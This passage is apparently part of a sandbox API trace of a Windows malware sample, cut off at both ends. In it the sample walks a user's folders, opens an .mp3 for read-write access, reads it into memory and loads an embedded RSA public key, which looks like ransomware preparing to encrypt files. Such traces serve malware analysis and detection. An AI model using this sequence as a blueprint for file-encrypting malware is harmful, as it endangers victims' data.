dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.499] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0194.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.499] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0194.499] PathFindFileNameW (pszPath="") returned="" [0194.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.499] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Local Settings\\*" (normalized: "c:\\users\\keecfmwgj\\local settings\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b06e0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0194.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0194.501] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0194.501] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0194.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0194.501] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0194.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0194.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0194.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0194.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0194.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.529] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0194.530] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0194.530] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0194.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.530] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0194.530] PathFindFileNameW (pszPath="") returned="" [0194.530] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\*" (normalized: "c:\\users\\keecfmwgj\\music\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x98121430, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x98121430, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0194.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.530] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x98121430, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x98121430, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0194.531] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb5a88c40, ftCreationTime.dwHighDateTime=0x1d89c6d, ftLastAccessTime.dwLowDateTime=0x6b678d10, ftLastAccessTime.dwHighDateTime=0x1d8a100, ftLastWriteTime.dwLowDateTime=0x6b678d10, ftLastWriteTime.dwHighDateTime=0x1d8a100, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BJHxLX", cAlternateFileName="")) returned 1 [0194.531] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e80a6a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0194.531] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\desktop.ini") returned=".ini" [0194.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0194.531] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37e14520, ftCreationTime.dwHighDateTime=0x1d89e1d, ftLastAccessTime.dwLowDateTime=0x6130d800, ftLastAccessTime.dwHighDateTime=0x1d89ee5, ftLastWriteTime.dwLowDateTime=0x6130d800, ftLastWriteTime.dwHighDateTime=0x1d89ee5, nFileSizeHigh=0x0, nFileSizeLow=0x6b4a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="esAg2qtf u0s5C0MdPd.mp3", cAlternateFileName="ESAG2Q~1.MP3")) returned 1 [0194.531] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\esAg2qtf u0s5C0MdPd.mp3") returned=".mp3" [0194.531] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\esAg2qtf u0s5C0MdPd.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\esag2qtf u0s5c0mdpd.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0194.532] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=27466) returned 1 [0194.532] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0194.535] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x6b24, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.535] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0194.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.537] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.537] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x6b4a, lpOverlapped=0x0) returned 1 [0194.538] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0194.538] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.538] lstrlenA (lpString="-----BEGIN PUBLIC 